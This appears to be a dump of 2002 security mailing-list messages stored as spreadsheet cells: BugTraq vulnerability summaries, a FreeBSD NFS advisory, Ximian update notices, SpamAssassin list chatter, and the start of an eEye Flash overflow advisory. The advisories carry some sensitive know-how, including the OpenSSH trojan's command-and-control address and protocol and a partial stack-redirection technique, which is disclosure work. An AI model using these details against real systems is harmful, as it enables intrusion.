contained in the configuration file, password.txt, are stored in plain
text. They may be read by simply viewing the file. The file, password.txt,
is stored in a web accessible location and is, itself, accessible for
retrieval. Thus it is trivial for an attacker to obtain user passwords and
abuse the Eupload service.This problem could allow an attacker to gain access to the passwords to
protected resources.11. Util-linux File Locking Race Condition Vulnerability
BugTraq ID: 5344
Remote: No
Date Published: Jul 29 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/5344
Summary:The util-linux package is a set of commonly used system utilities such as
'chfn' and 'chsh'.  It is included with many Linux distributions.A race condition has been reported in code shared by the util-linux
utilities.  The condition is related to file locking.  Failure to check
for the existence of a lockfile prior to sensitive operations may, under
specific circumstances, open a window of opportunity for attack.  The
util-linux utilities often write to sensitive files such as /etc/passwd/.
Attackers may exploit the condition to inject arbitrary data into these
files to elevate privileges.The reported attacks are complex, time dependent and require specific
circumstances such as system administrator interaction and a large passwd
file.Red Hat Linux is known to ship with util-linux as a core component.
Other distributions, those that are derived from Red Hat in particular,
may also be vulnerable.It should be noted that the utilities included with the shadow-utils
package (shipped with SuSE Linux) are not vulnerable.12. OpenSSL Kerberos Enabled SSLv3 Master Key Exchange Buffer Overflow Vulnerability
BugTraq ID: 5361
Remote: Yes
Date Published: Jul 30 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/5361
Summary:OpenSSL is an open source implementation of the SSL protocol. It is used
by a number of other projects, including but not restricted to Apache,
Sendmail, Bind, etc.. It is commonly found on Linux and Unix based
systems.A vulnerability has been reported for OpenSSL 0.9.7 pre-release versions.This vulnerability is present only when Kerberos is enabled for a system
using SSL version 3.When initiatiating contact between a SSLv3 server, master keys are
exchanged between the client and the server. When an oversized master key
is supplied to a SSL version 3 server by a malicious client, it may cause
a buffer to overflow on the vulnerable system. As a result, stack memory
on the vulnerable server will become corrupted. This could enable the
attacker to take control of the SSLv3 server process and cause it to
execute malicious, attacker supplied code.** This vulnerability was originally part of BID 5353, Multiple OpenSSL
Buffer Overflow Vulnerabilities. It has now been reissued as a separate
vulnerability.13. OpenSSL ASCII Representation Of Integers Buffer Overflow Vulnerability
BugTraq ID: 5364
Remote: Yes
Date Published: Jul 30 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/5364
Summary:OpenSSL is an open source implementation of the SSL protocol.  It is used
by a number of other projects, including but not restricted to Apache,
Sendmail, Bind, etc..  It is commonly found on Linux and Unix based
systems.Remotely exploitable buffer overflow conditions have been reported in
OpenSSL.  This issue is due to insufficient checking of bounds with
regards to ASCII representations of integers on 64 bit platforms.  It is
possible to overflow these buffers on a vulnerable system if overly large
values are submitted by a malicious attacker.Exploitation of this vulnerability may allow execution of arbitrary code
with the privileges of the vulnerable application, service or client.Oracle reports that CorporateTime Outlook Connector is only vulnerable
under Microsoft Windows 98, NT, 2K, and XP.** This vulnerability was originally part of BID 5353, Multiple OpenSSL
Buffer Overflow Vulnerabilities. It has now been reissued as a separate
vulnerability.14. ParaChat Phantom User Denial Of Service Vulnerability
BugTraq ID: 5370
Remote: Yes
Date Published: Jul 31 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/5370
Summary:ParaChat is a web-based chatting system.  It is available for most Unix
and Linux variants as well as Microsoft Windows operating systems.ParaChat chat servers are prone to a denial of service condition.If a user has left the webpage for a chat room using the Back or Forward
buttons of their browser in lieu of logging out, their account will still
be logged into the chat room until it times out 15 minutes later.  A
malicious user may do this repeatedly as different users to overload the
chat server with "phantom" users.  A denial of service may be the result.15. OpenSSH Trojan Horse Vulnerability
BugTraq ID: 5374
Remote: Yes
Date Published: Aug 01 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/5374
Summary:OpenSSH is a freely available implementation of the SSH client-server
protocol. It is distributed and maintained by the OpenSSH team.Reportedly, the server hosting openssh, ftp.openbsd.org, was compromised
recently. It has been reported that the intruder made modifications to the
source code of openssh to include trojan horse code. Downloads of the
openssh source code from ftp.openbsd.org between July 30, 2002 and July
31, 2002 likely contain the trojan code.The trojan code appears to be included in the file, bf-test.c. Reports say
that the trojan will run once upon compilation of openssh. The trojan
process is named 'sh' or the compiling user's default shell. Once executed
the trojan attempts to connect to 203.62.158.32 on port 6667. The trojan
will then wait for one of three commands. A connection to the specified
address is attempted once every hour.'D' will cause the trojan to execute '/bin/sh'. 'M' will cause the trojan
to respawn and 'A' will terminate the trojan process. It is highly
probable that this trojan will give remote root access to vulnerable
systems.The following sites also have been reported to carry the trojaned version of openssh-3.4p1.tar.gz:
ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/
ftp://ftp.usa.openbsd.org/pub/OpenBSD/OpenSSH/
ftp://ftp1.se.openbsd.org/pub/OpenBSD/OpenSSH/It is not known whether other sites are affected as well.FreeBSD has reported the following MD5 checksum information. The following
is the MD5 checksum of the trojaned version of openssh: MD5
(openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57The following is the MD5 checksum of openssh in the FreeBSD ports
directory: MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8Note that a different checksum does not mean the backdoor does not exist.*** The OpenSSH team has released an advisory. Fixed versions of openssh
are available for download since 1300 UTC August 1, 2002. The following
MD5 checksum information was provided for fixed versions of openssh:MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8
MD5 (openssh-3.4p1.tar.gz.sig) = d5a956263287e7fd261528bb1962f24c
MD5 (openssh-3.4.tgz) = 39659226ff5b0d16d0290b21f67c46f2
MD5 (openssh-3.2.2p1.tar.gz) = 9d3e1e31e8d6cdbfa3036cb183aa4a01
MD5 (openssh-3.2.2p1.tar.gz.sig) = be4f9ed8da1735efd770dc8fa2bb808a16. Bharat Mediratta Gallery Remote File Include Vulnerability
BugTraq ID: 5375
Remote: Yes
Date Published: Aug 01 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/5375
Summary:Gallery is an open source web based photo album. It is written in PHP and
is available for Linux and Unix variant as well as Microsoft Windows
operating systems.Gallery is prone to an issue which may allow remote attackers to include
arbitrary files located on remote servers. This issue is present in the
following PHP script files provided with Gallery: errors/configmode.php
errors/needinit.php errors/reconfigure.php errors/unconfigured.php
captionator.phpAn attacker may exploit this by supplying a path to a file, 'init.php', on
a remote host as a value for the 'GALLERY_BASEDIR' parameter.If the remote file is a PHP script, this may allow for execution of
attacker-supplied PHP code with the privileges of the webserver.
Successful exploitation may provide local access to the attacker.17. John G. Myers MUnpack Malformed MIME Encoded Message Buffer Overflow Vulnerability
BugTraq ID: 5385
Remote: No
Date Published: Aug 02 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/5385
Summary:John G. Myers mpack/munpack is a pair of utilities to encode and decode
MIME format email. Versions are available for Linux and Unix variant
operating systems as well as Microsoft DOS.A buffer overflow vulnerability has been reported for munpack 1.5.
Reportedly, it is possible to cause munpack to crash when it receives a
malformed email or NNTP news article.As this vulnerability is the result of a buffer overflow condition, it may
be possible for an attacker to cause munpack to execute malicious attacker
supplied code. This has not, however, been confirmed.18. Dispair Remote Command Execution Vulnerability
BugTraq ID: 5392
Remote: Yes
Date Published: Jul 30 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/5392
Summary:Dispair is a web-based .tar.gz archive viewer.  It is written in Perl and
is available for Linux and Unix operating systems.Dispair fails to sufficiently validate user-supplied input before it is
passed to the shell via the Perl open() function.  A remote attacker may
exploit this condition by injecting arbitrary commands into CGI parameters
in a request to the vulnerable script.The result of successful exploitation is that attackers may potentially
exploit this issue to execute arbitrary commands on the underlying shell
with the privileges of the webserver process.19. Mailreader Session Hijacking Vulnerability
BugTraq ID: 5393
Remote: Yes
Date Published: Aug 02 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/5393
Summary:Mailreader is an open source project which allows POP3 mail access through
a web interface. Mailreader is implemented in Perl, and should work under
Microsoft Windows, Linux and other Unix based operating systems.A vulnerability has been reported in some versions of Mailreader. It may
be possible for a remote attacker to hijack the session of a legitimate
user of the system. This may result in access to sensitive information, or
the ability to send mail and otherwise function as the legitimate user.Full exploit details are not available. It is possible that this
vulnerability results from session information being tracked through CGI
parameters, which may be trivially spoofed by a remote user. This
possibility has not, however, been confirmed.20. John G. Myers MPack/MUnpack Malformed Filename Vulnerability
BugTraq ID: 5386
Remote: No
Date Published: Aug 02 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/5386
Summary:John G. Myers mpack/munpack is a pair of utilities to encode and decode
MIME format email. Versions are available for Linux and Unix variant
operating systems as well as Microsoft DOS.A vulnerability has been reported for mpack/munpack 1.5. Reportedly, it is
possible to cause munpack to create files outside of a designated
directory. When mpack/munpack receives a MIME encoded message with an
attachment that refers to a file, using a '../' sequence followed by the
filename, it may decode the attachment outside of a designated directory.The impact of this vulnerability is limited as it has been reported that
munpack will only accept a single '../' sequence and will not overwrite
any existing files.21. Fake Identd Client Query Remote Buffer Overflow Vulnerability
BugTraq ID: 5351
Remote: Yes
Date Published: Jul 29 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/5351
Summary:Fake Identd is an open source Ident server designed to return the same
information to all incoming requests. It is implemented by Tomi Ollila,
and available for Linux and a number of other Unix based operating
systems.Reportedly, some versions of Fake Identd fail to properly handle long
client requests. A specially formatted request split across multiple TCP
packets may cause an internal buffer to overflow. Reportedly, execution of
arbitrary code as the Fake Identd server process is possible.Fake Identd is designed to drop privileges. However, it has also been
reported that this behavior is flawed in some versions. As a result,
exploitation may result in the execution of code with root privileges.
III. LINUX FOCUS LIST SUMMARY
---------------------------------
1. LDAP Auth? (Thread)
Relevant URL:http://online.securityfocus.com/archive/91/2851672. LDAP auth (Thread)
Relevant URL:http://online.securityfocus.com/archive/91/2851683. Administrivia: Gone Fishin' (Thread)
Relevant URL:http://online.securityfocus.com/archive/91/285159_x0018_
IV. NEW PRODUCTS FOR LINUX PLATFORMS
------------------------------------
1. Gateway Guardian
by NetMaster Networking Solutions, Inc.
Platforms: Linux
Relevant URL:
http://www.netmaster.com/products/gatewayguardian.html
Summary:Developed with NetMaster's own Linux distribution tailored specifically
for firewall applications, Gateway Guardian is a very flexible, high-end
firewall that takes a revolutionary approach to allowing a company to use
a lower-end PC as their Internet gateway. Running on a PC that is not the
Internet gateway, Gateway Guardian uses a pure Java application to
preconfigure hardware, Internet provider settings, and firewall rules
through a wizard like format. When the information has been entered, the
Java application writes an entire Linux operating system and the custom
firewall configuration onto a 3-1/4" floppy diskette.2. PakSecured Linux
by Paktronix Systems
Platforms: Linux
Relevant URL:
http://www.paktronix.com/products/paklinux.php
Summary:PakSecured Linux PakSecured Linux is currently the only complete Policy
Routing Operating System with a broad computing platform base. Based on
the Linux OS, PakSecured Linux runs on all processor families capable of
running the Linux kernel. Policy Routing encompasses Quality of Service
(QoS), Advanced TCP/IP routing of IPv4 and IPv6, IPSec encryption and VPN
structures, Bandwidth Allocation and Traffic Shaping, and Address
Allocation features such as NAT and IP Masquerade. While these features
are available independently in various products, PakSecured Linux
implements the full range of Policy Routing. All of these features are
integrated into a hardened OS distribution designed to operate in hostile
network environments. PakSecured Linux has no desktop or user based
functionality and is specifically targeted at servers with a need for high
security, 24x7 uptime, and which are required to run without operator
intervention. Coupling these needs with the flexibility and power of a
complete Policy Routing structure puts PakSecured Linux into a unique
niche.3. Progressive Systems VPN
by Progressive Systems
Platforms: Linux, Propietary Hardware
Relevant URL:
http://www.progressive-systems.com/products/vpn/
Summary:Progressive Systems VPN is a remote access VPN designed to let you quickly
and securely allow remote network access to whomever you choose, and to
only those you allow. Progressive Systems VPN features SmartGate from
V-One. SmartGate is the market share leading extranet VPN product now
available for Linux or as an appliance through Progressive Systems.
V. NEW TOOLS FOR LINUX PLATFORMS
--------------------------------
1. Astaro Security Linux (Stable 3.x) v3.202
by astaro
Relevant URL:
http://www.astaro.com/products/index.html
Platforms: Linux, POSIX
Summary:Astaro Security Linux is a firewall solution. It does stateful packet
inspection filtering, content filtering, user authentication, virus
scanning, VPN with IPSec and PPTP, and much more. With its Web-based
management tool, WebAdmin, and the ability to pull updates via the
Internet, it is pretty easy to manage. It is based on a special hardened
Linux 2.4 distribution where most daemons are running in change-roots and
are protected by kernel capabilities.2. FCheck 2.07.59
by Michael A. Gumienny
Relevant URL:
http://www.geocities.com/fcheck2000/FCheck_2.07.59.tar.gz
Platforms: AIX, BSDI, DG-UX, Digital UNIX/Alpha, FreeBSD, HP-UX, Linux,
NetBSD, OpenBSD, Perl (any system supporting perl), SCO, Solaris, SunOS,
UNIX, Unixware, Windows 2000, Windows 3.x, Windows 95/98, Windows NT
Summary:FCHECK is a very stable PERL script written to generate and comparatively
monitor a UNIX system against its baseline for any file alterations and
report them through syslog, console, or any log monitoring interface.
Monitoring events can be done in as little as one minute intervals if a
system's drive space is small enough, making it very difficult to
circumvent. This is a freely-available open-source alternative to
'tripwire' that is time tested, and is easier to configure and use.3. The @stake Sleuth Kit (TASK) v1.50
by @stake
Relevant uRL:
http://www.atstake.com/research/tools/task/
Platforms: FreeBSD, Linux, MacOS, OpenBSD, Solaris
Summary:The @stake Sleuth Kit (TASK) is the only open source forensic toolkit for
a complete analysis of Microsoft and UNIX file systems. TASK enables
investigators to identify and recover evidence from images acquired during
incident response or from live systems. TASK is also open source, allowing
investigators to verify the actions of the tool or customize it to
specific needs.
VI. SPONSORSHIP INFORMATION
---------------------------
This newsletter is sponsored by: SecurityFocus DeepSight Threat Management
System&gt;&gt;From June 24th - August 31st, 2002, SecurityFocus announces a FREE
two-week trial of the DeepSight Threat Management System: t</t>
  </si>
  <si>
    <t>CVS users: heads up! I think we've been talking about it long enough, so
we might as well check it in now.  It's about time to check in
http://bugzilla.spamassassin.org/show_bug.cgi?id=546This change will *remove* support for delivery to a local mailbox (ie the
default mode of operation when "spamassassin" is run).In addition, the "From " line will no longer be added to mails as a
result.--j.-- 
'Justin Mason' =&gt; { url =&gt; http://jmason.org/ , blog =&gt; http://taint.org/ }
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Spamassassin-talk mailing list
Spamassassin-talk@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/spamassassin-talk</t>
  </si>
  <si>
    <t xml:space="preserve">
Marc -- Since perl itself is a scripting language, and allows code to be eval'ed,
I can't see why we need to go the whole hog and implement another
turing-complete scripting language in perl.Let's go back to *why* this would be useful.  As far as I can see, you're
proposing this to deal with multi-match rules.  There's already a tracker
in the bug DB for these, with a proposed implementation.  http://www.hughes-family.org/bugzilla/show_bug.cgi?id=47I think this might have stalled due to shortcomings in the existnig
proposal, so I've just added my own thoughts on how to implement them. ;)
Comments on the proposed system would be welcome folks.... reply to the
bug db.--j.-- 
'Justin Mason' =&gt; { url =&gt; http://jmason.org/ , blog =&gt; http://taint.org/ }
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Spamassassin-devel mailing list
Spamassassin-devel@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/spamassassin-devel</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Thor,[Still trying to catch my breath] :-)I guess there's no easy way to avoid this. In order to proactively
protect endusers they'll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 I'll leave you to do the test.
Consider that corporate and endusers are most likely using Microsoft
software without updating as they should. AV-software is now trying to
protect these poor souls adding proxy functionality to catch e.g.
malicious content in HTML based e-mails and for a good reason. Looking
at http://www.pivx.com/larholm/unpatched/ says it all!  ;-)Med venlig hilsen // Kind regardsPeter Kruse
Security- and Virusanalyst
Telia @ Security
http://www.teliainternet.dk
Member of AVIEN and FIRST&gt; -----Oprindelig meddelelse-----
&gt; Fra: Thor Larholm [mailto:Thor@jubii.dk] 
&gt; Sendt: 5. august 2002 10:13
&gt; Til: 'nick@virus-l.demon.co.uk'; FOCUS-VIRUS@SECURITYFOCUS.COM
&gt; Emne: RE: More content filtering woes
&gt; 
&gt; 
&gt; What I find even more annoying is the horde of false 
&gt; positives that antivirus software constantly yaps one about 
&gt; each time one sends some demonstratory POC to a mailinglist 
&gt; only to have several witless antivirus vendors add ones POC 
&gt; to their virus library, yielding tons of "Quarantined" 
&gt; replies on a daily basis without any added level of security 
&gt; to the enduser whatsoever since any reallife exploitation 
&gt; would yield a completely different signature, thus defeating 
&gt; the purpose of adding ones signature.
&gt; 
&gt; *phew* That could have used some punctuation. :)
&gt; 
&gt; 
&gt; 
&gt; 
&gt; Regards
&gt; Thor Larholm
&gt; Jubii A/S - Internet Programmer
&gt; 
</t>
  </si>
  <si>
    <t xml:space="preserve">-----BEGIN PGP SIGNED MESSAGE-----=============================================================================
FreeBSD-SA-02:36.nfs                                        Security Advisory
                                                          The FreeBSD ProjectTopic:          Bug in NFS server code allows remote denial of serviceCategory:       core
Module:         nfs
Announced:      2002-08-05
Credits:        Mike Junk 
Affects:        All releases prior to 4.6.1-RELEASE-p7
                4.6-STABLE prior to the correction date
Corrected:      2002-07-19 17:19:53 UTC (RELENG_4)
                2002-08-01 19:31:55 UTC (RELENG_4_6)
                2002-08-01 19:31:54 UTC (RELENG_4_5)
                2002-08-01 19:31:54 UTC (RELENG_4_4)
FreeBSD only:   NOI.   BackgroundThe Network File System (NFS) allows a host to export some or all of
its filesystems, or parts of them, so that other hosts can access them
over the network and mount them as if they were on local disks.  NFS is
built on top of the Sun Remote Procedure Call (RPC) framework.II.  Problem DescriptionA part of the NFS server code charged with handling incoming RPC
messages had an error which, when the server received a message with a
zero-length payload, would cause it to reference the payload from the
previous message, creating a loop in the message chain.  This would
later cause an infinite loop in a different part of the NFS server
code which tried to traverse the chain.III. ImpactCertain Linux implementations of NFS produce zero-length RPC messages
in some cases.  A FreeBSD system running an NFS server may lock up
when such clients connect.An attacker in a position to send RPC messages to an affected FreeBSD
system can construct a sequence of malicious RPC messages that cause
the target system to lock up.IV.  Workaround1) Disable the NFS server: set the nfs_server_enable variable to "NO"
   in /etc/rc.conf, and reboot.   Alternatively, if there are no active NFS clients (as listed by the
   showmount(8) utility), just killing the mountd and nfsd processes
   should suffice.2) Add firewall rules to block RPC traffic to the NFS server from
   untrusted hosts.V.   SolutionThe following patch has been verified to apply to FreeBSD 4.4, 4.5, and
4.6 systems.a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:36/nfs.patch
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:36/nfs.patch.ascb) Apply the patch.# cd /usr/src
# patch &lt; /path/to/patchc) Recompile your kernel and modules as described in
 and reboot the
system.VI.  Correction detailsThe following list contains the revision numbers of each file that was
corrected in FreeBSD.Path                                                             Revision
  Branch
- -------------------------------------------------------------------------
src/sys/nfs/nfs_socket.c
  RELENG_4                                                       1.60.2.5
  RELENG_4_6                                                 1.60.2.3.2.1
  RELENG_4_5                                                 1.60.2.1.6.1
  RELENG_4_4                                                 1.60.2.3.4.1
- -------------------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (FreeBSD)iQCVAwUBPU8NTVUuHi5z0oilAQHMZAP+L80QudeELKHfZYxG5PPf6cuWkreACavl
LP1oJDHLWuw32K4tM0Y+v505t+U2/wGnl2dSqwkfemzxlhzfsmrbubQx8EFgO6sb
nhEEtSfu4t81ylHTY+qEWFtRweB5A1tGJaYV67wybWZxulkYJ9qnRLKF4PToc0E3
T1Y/CN0DNYA=
=2YSa
-----END PGP SIGNATURE-----
</t>
  </si>
  <si>
    <t xml:space="preserve">
On Tuesday, August 6, 2002, at 10:19  AM, Justin Mason wrote:&gt;
&gt; "Craig R.Hughes" said:
&gt;
&gt;&gt; Excellent.  After that, I'd suggest we work on stabilizing (ie
&gt;&gt; no new features) for a bit, and getting 2.40 released.  I think
&gt;&gt; we're in reasonably good shape now with 2.40 (plus or minus some
&gt;&gt; build issues occasionally creeping in), and Razor2 is starting
&gt;&gt; to get a little less flakey (minus one or two server issues in
&gt;&gt; the last few days).
&gt;
&gt; Yeah, I agree.  Although note: I'd like to see the proposal to use
&gt; Received IPs in the AWL, get into 2.40 too.  That's being actively
&gt; exploited right now.Yeah, AWL IPs is a good thing for 2.40&gt; Razor2 is definitely getting solid, and getting some good hits too!When it works, yeah.  But it's so flakey I have to turn it off 
so that my mail can be guaranteed to actually get through in a 
decent timeframe.C
</t>
  </si>
  <si>
    <t xml:space="preserve">The Ximian Security Team has been issuing advisories for security 
problems in Ximian GNOME for some time now at this URL:http://support.ximian.com/s?&amp;p_cat_lvl1=12Starting today we will begin to also email security advisories to
this list (updates@ximian.com) to raise the awareness of potential 
problems.The Ximian Security Team
_______________________________________________
updates maillist  -  updates@ximian.com
http://lists.ximian.com/mailman/listinfo/updates
Please DO NOT reply to this list!  Use bugs@helixcode.com or hello@helixcode.com instead.
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Headline MailerUnderground Movies of My Talks?
    posted by pudge on Tuesday August 06, @06:23 (others)
    http://use.perl.org/article.pl?sid=02/08/05/1323232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</si>
  <si>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Underground Movies of My Talks?+--------------------------------------------------------------------+
| Underground Movies of My Talks?                                    |
|   posted by pudge on Tuesday August 06, @06:23 (others)            |
|   http://use.perl.org/article.pl?sid=02/08/05/1323232              |
+--------------------------------------------------------------------+[0]Dominus writes "At my talks at TPC this year I noticed people in the
audience with video recorders. That's fine with me, but now I want to see
the recordings! I saw at least two people recording 'Mailing List Judo'
and 'Conference Presentation Judo.' If you do have a video, please drop
me a note. Thanks." I wouldn't mind an audio or video recording of my
YAPC talk either, if someone had such a beast.Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/08/05/1323232Links:
    0. mailto:mjd@plover.comCopyright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</si>
  <si>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Severity: Security
Product: libpng
Keywords: Red Carpet libpng buffer overflow
URL: http://support.ximian.com/q?283
References: 
Release Notes for libpng 
ftp://swrinde.nde.swri.edu/pub/png-group/archives/png-list.200207libpng is a library used to create and manipulate PNG (Portable
Network Graphics) image files.The 1.2.4* and 1.0.14 releases of libpng solve a potential buffer
overflow vulnerability[1] in some functions related to progressive
image loading. Programs such as mozilla and various others use these
functions. An attacker could exploit this to remotely run arbitrary
code or crash an application by using a specially crafted png image.These new releases also solve other minor bugs such as some memory
leaks in reading image functions.Since most applications which display images use libpng, this affects
many applications including Evolution and Mozilla. Additionally, Red
Carpet links libpng statically and needs to be updated separately.Ximian only ships libpng on Solaris, and so we only have Solaris
packages available. When distribution vendors update their packages,
they will be available in Red Carpet. Please use Red Carpet to upgrade
libpng to 1.0.14 and Red Carpet 1.3.4-2. You can also get packages
from the Ximian FTP site:Solaris 7/8
ftp://ftp.ximian.com/pub/ximian-gnome/solaris-7-sun4/libpng-1.0.14-1.ximian.1.sparc.rpm
ftp://ftp.ximian.com/pub/ximian-gnome/solaris-7-sun4/libpng-devel-1.0.14-1.ximian.1.sparc.rpm
ftp://ftp.ximian.com/pub/ximian-gnome/solaris-7-sun4/red-carpet-1.3.4-2.ximian.1.sparc.rpm_______________________________________________
updates maillist  -  updates@ximian.com
http://lists.ximian.com/mailman/listinfo/updates
Please DO NOT reply to this list!  Use bugs@helixcode.com or hello@helixcode.com instead.
</t>
  </si>
  <si>
    <t xml:space="preserve">CAN-2002-0384  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0384
RHSA-2002-098  http://rhn.redhat.com/errata/RHSA-2002-098.html
Gaim Changelog http://gaim.sourceforge.net/ChangeLogGaim is an instant messaging client based on the published TOC
protocol from AOL. Versions of Gaim prior to 0.58 contain a buffer
overflow in the Jabber plug-in module.Please download Gaim 0.59 or later using Red Carpet. You may also
obtain this update from the Ximian FTP site.Debian Potato
ftp://ftp.ximian.com/pub/ximian-gnome/debian-potato-i386/gaim_0.59-1.ximian.1_i386.deb
ftp://ftp.ximian.com/pub/ximian-gnome/debian-potato-i386/gaim-common_0.59-1.ximian.1_i386.deb
ftp://ftp.ximian.com/pub/ximian-gnome/debian-potato-i386/gaim-gnome_0.59-1.ximian.1_i386.debMandrake 8.0
ftp://ftp.ximian.com/pub/ximian-gnome/mandrake-80-i586/gaim-0.59-1.ximian.1.i586.rpmMandrake 8.1
ftp://ftp.ximian.com/pub/ximian-gnome/mandrake-81-i586/gaim-0.59-1.ximian.1.i586.rpmMandrake 8.2
ftp://ftp.ximian.com/pub/ximian-gnome/mandrake-82-i586/gaim-0.59-1.ximian.1.i586.rpmRedhat 6.2
ftp://ftp.ximian.com/pub/ximian-gnome/redhat-62-i386/gaim-0.59-1.ximian.1.i386.rpm
ftp://ftp.ximian.com/pub/ximian-gnome/redhat-62-i386/gaim-applet-0.59-1.ximian.1.i386.rpmRedhat 7.0
ftp://ftp.ximian.com/pub/ximian-gnome/redhat-70-i386/gaim-0.59-1.ximian.1.i386.rpm
ftp://ftp.ximian.com/pub/ximian-gnome/redhat-70-i386/gaim-applet-0.59-1.ximian.1.i386.rpmRedhat 7.1
ftp://ftp.ximian.com/pub/ximian-gnome/redhat-71-i386/gaim-0.59-1.ximian.1.i386.rpm
ftp://ftp.ximian.com/pub/ximian-gnome/redhat-71-i386/gaim-applet-0.59-1.ximian.1.i386.rpmRedhat 7.2
ftp://ftp.ximian.com/pub/ximian-gnome/redhat-72-i386/gaim-0.59-1.ximian.1.i386.rpm
ftp://ftp.ximian.com/pub/ximian-gnome/redhat-72-i386/gaim-applet-0.59-1.ximian.1.i386.rpmRedhat 7.3
ftp://ftp.ximian.com/pub/ximian-gnome/redhat-73-i386/gaim-0.59-1.ximian.1.i386.rpm
ftp://ftp.ximian.com/pub/ximian-gnome/redhat-73-i386/gaim-applet-0.59-1.ximian.1.i386.rpmSolaris 7/8
ftp://ftp.ximian.com/pub/ximian-gnome/solaris-7-sun4/gaim-0.59-1.ximian.1.sparc.rpm
ftp://ftp.ximian.com/pub/ximian-gnome/solaris-7-sun4/gaim-applet-0.59-1.ximian.1.sparc.rpmSuSE 7.1
ftp://ftp.ximian.com/pub/ximian-gnome/suse-71-i386/gaim-0.59-1.ximian.1.i386.rpm
ftp://ftp.ximian.com/pub/ximian-gnome/suse-71-i386/gaim-applet-0.59-1.ximian.1.i386.rpmSuSE 7.2
ftp://ftp.ximian.com/pub/ximian-gnome/suse-72-i386/gaim-0.59-1.ximian.1.i386.rpm
ftp://ftp.ximian.com/pub/ximian-gnome/suse-72-i386/gaim-applet-0.59-1.ximian.1.i386.rpmSuSE 7.3
ftp://ftp.ximian.com/pub/ximian-gnome/suse-73-i386/gaim-0.59-1.ximian.1.i386.rpm
ftp://ftp.ximian.com/pub/ximian-gnome/suse-73-i386/gaim-applet-0.59-1.ximian.1.i386.rpmSuSE 8.0
ftp://ftp.ximian.com/pub/ximian-gnome/suse-80-i386/gaim-0.59-1.ximian.1.i386.rpm
ftp://ftp.ximian.com/pub/ximian-gnome/suse-80-i386/gaim-applet-0.59-1.ximian.1.i386.rpmYellowdog 2.0
ftp://ftp.ximian.com/pub/ximian-gnome/yellowdog-20-ppc/gaim-0.59-1.ximian.1.ppc.rpm
ftp://ftp.ximian.com/pub/ximian-gnome/yellowdog-20-ppc/gaim-applet-0.59-1.ximian.1.ppc.rpmYellowdog 2.1
ftp://ftp.ximian.com/pub/ximian-gnome/yellowdog-21-ppc/gaim-0.59-1.ximian.1.ppc.rpm
ftp://ftp.ximian.com/pub/ximian-gnome/yellowdog-21-ppc/gaim-applet-0.59-1.ximian.1.ppc.rpmYellowdog 2.2
ftp://ftp.ximian.com/pub/ximian-gnome/yellowdog-22-ppc/gaim-0.59-1.ximian.1.ppc.rpm
ftp://ftp.ximian.com/pub/ximian-gnome/yellowdog-22-ppc/gaim-applet-0.59-1.ximian.1.ppc.rpm_______________________________________________
updates maillist  -  updates@ximian.com
http://lists.ximian.com/mailman/listinfo/updates
Please DO NOT reply to this list!  Use bugs@helixcode.com or hello@helixcode.com instead.
</t>
  </si>
  <si>
    <t xml:space="preserve">Problem with spamtrap
Could not lock /home/yyyy/lib/spamtrap/spam.mbox: File exists at lib/Mail/SpamAssassin/NoMailAudit.pm line 484,  line 94.
</t>
  </si>
  <si>
    <t xml:space="preserve">"Tony L. Svanstrom"  writes:&gt; IMHO it's wrong that any company is allowed to use the name of a public
&gt; project commercially, while others aren'tÂ´; esp. when it's a name that tells
&gt; Average Joe that that version is so much better than the free one.Dude, take that one up with Redhat, Suse, IBM or any of the other folks using
the name of a public project (i.e. Linux) for a commercial product.  ;-)This is not only a concept with precedent it's actually quite common.rw2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</si>
  <si>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Ross Vandegrift said:&gt; Won't this whitelist spams sent to mailing lists though?only if you've whitelisted the mailing list.  In that case, c'est la vie
;)--j.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</si>
  <si>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Theo Van Dinter said:&gt; Well, I have my users bounce me their spams (which means there's 2
&gt; users who do it), and I wrote this procmail bit just for the reason
&gt; you mentioned:urgh.  I guess fixing the spamtraps to strip the headers before
writing them is the best thing to do...--j.
</t>
  </si>
  <si>
    <t xml:space="preserve">Macromedia Shockwave Flash Malformed Header OverflowRelease Date: August 8, 2002Severity:
High (Remote Code Execution)Systems Affected:
Macromedia Shockwave Flash - All Versions;
Unix and Windows; Netscape and Internet ExplorerDescription:
While working on some pre-release eEye Retina CHAM tools, an exploitable
condition was discovered within the Shockwave Flash file format called SWF
(pronounced "SWIF").Since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web-browsing functionality.Technical Description:
The data header is roughly made out to:[Flash signature][version (1)][File Length(A number of bytes too
short)][frame size (malformed)][Frame Rate (malformed)][Frame Count
(malformed)][Data]By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8 bytes back
from the stack pointer. By using a relative jump we redirect flow into a
"call dword ptr [esp+N]", where N is the number of bytes from the stack
pointer. These "jump points" can be located in multiple loaded dll's. By
creating a simple tool using the debugging API and ReadMemory, you can
examine a process's virtual address space for useful data to help you with
